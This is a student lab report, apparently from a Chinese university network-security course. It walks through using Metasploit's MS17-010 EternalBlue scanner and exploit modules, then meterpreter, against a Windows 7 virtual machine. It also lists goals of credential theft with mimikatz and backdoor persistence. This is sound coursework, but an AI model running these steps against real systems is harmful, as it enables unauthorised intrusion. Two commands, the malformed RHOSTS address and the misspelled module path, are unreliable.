实验任务书
课程名称 网络安全软件开发 指导教师 石海赟 实验日期 2021.3.12
班
级 网络 2 班
姓
名 陈欣紫 学
号 2018211001001403
实验成绩
一、实验项目名称
使用 KALI 进行 MS17_010 渗透提权
二、实验目的及要求
1. 熟悉 kali 的基本安装与使用
2. 理解软件 msf 的模块调用与使用
3. 掌握 MS17_010 的模块的 mimikatz 软件使用
2.掌握 windows 的密码破解以及 hash 破解
三、实验环境
Windows、KALI
四、实验内容
1. 掌握永恒之蓝的使用以及 msf 模块的使用
2. 掌握基本提权与后门维持
五、实验步骤
1、搭建好环境准备,在 WMware 虚拟机软件中分别建立以 kali 和 win7 为镜像的虚拟机,按
照步骤安装好后,配置好虚拟机设置以及网络连接。
2、分别打开两台虚拟机,在 win7 中打开 cmd,查看 ip 地址
3、在 Kali 中打开终端,输入 msfconsole
4、搜索永恒之蓝代号 ms17_010
5、首先开始扫描局域网中存在的永恒之蓝的漏洞的电脑
6、填写需要扫描的网段并运行脚本
7、找到包含 MS17-010(确定 IP 后面确定有 ms17_010 漏洞即可确定为漏洞)
8、调用攻击模块 exploit/windows/smb/ms17_010_eternalblue
9、调用 meterpreter 工具攻击
六、实验程序与实验结果
实验程序:(详细见实验步骤截图代码命令)
msfconsole
search 17_010
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.199.136.0/24
run
use exploit/windows/smb/ms_010_eternalblue
meterpreter
shell
实验结果:
七、实验总结
通过本次实验我们学习复原了永恒之蓝的攻击原理及过程,初步熟悉了 kali 工具的基
本使用,但对于代码的理解和运用仍需继续学习加强。
八、教师评阅意见